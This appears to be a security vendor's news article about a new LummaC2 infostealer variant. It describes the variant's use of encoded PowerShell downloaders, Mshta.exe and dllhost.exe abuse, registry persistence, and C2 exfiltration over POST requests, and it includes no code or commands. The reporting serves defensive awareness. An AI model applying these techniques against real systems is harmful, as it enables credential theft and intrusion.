HQ/EMEAFind out how we can help your business
The notorious information-stealing virus dubbed LummaC2 has reemerged in the cybercriminal landscape to access and exfiltrate sensitive information. Based on reports, this latest malware strain adopts complex strategies that pose considerable threats to targeted computers.
Researchers first spotted this threat after it appeared in Russian-speaking forums a couple of years ago. It is a C-based tool distributed as Malware-as-a-Service (MaaS) that caters to various threat groups in their cybercriminal operations.
The malware authors allegedly developed this infostealer to steal sensitive data from infected endpoints, such as credentials and personal information. However, research revealed that the new strain’s initial attack vector now uses obfuscated PowerShell prompts to download and execute payloads.
For malicious reasons, the malware frequently leverages Microsoft’s legitimate LOLbins (Living-off-the-Land binaries), such as Mshta.exe and Dllhost.exe.
The new LummaC2 malware variant uses a PowerShell instruction to download additional hostile prompts that would further the damage on the infected endpoint.
The latest LummaC2 malware infection occurs in multiple stages. This malware’s initial operation is through an encoded PowerShell command that downloads more malicious scripts and files.
The malware then decrypts and runs the malicious payloads on the target device, frequently presenting itself as legitimate files to bypass security detection. In addition, LummaC2 utilises Mshta.exe to initiate HTML application files as its initial payload. This tactic allows the malware to remain discreet by using trusted Windows binaries.
It also starts automatically using common registry locations, providing its operators with continuous access to compromised machines. Furthermore, the malware communicates with a C2 server using POST requests to exfiltrate data and receive instructions.
The infection also employs the “dllhost.exe” process for communication, allowing attackers to control the infected system remotely. However, the most threatening part of this malware is LummaC2’s approaches since it is compatible with several MITRE ATT&CK frameworks, including Process Injection (T1055) and Persistence via Registry Modification (T1547.001).
Organisations should have better endpoint monitoring solutions and install security measures to counteract these sophisticated threats.
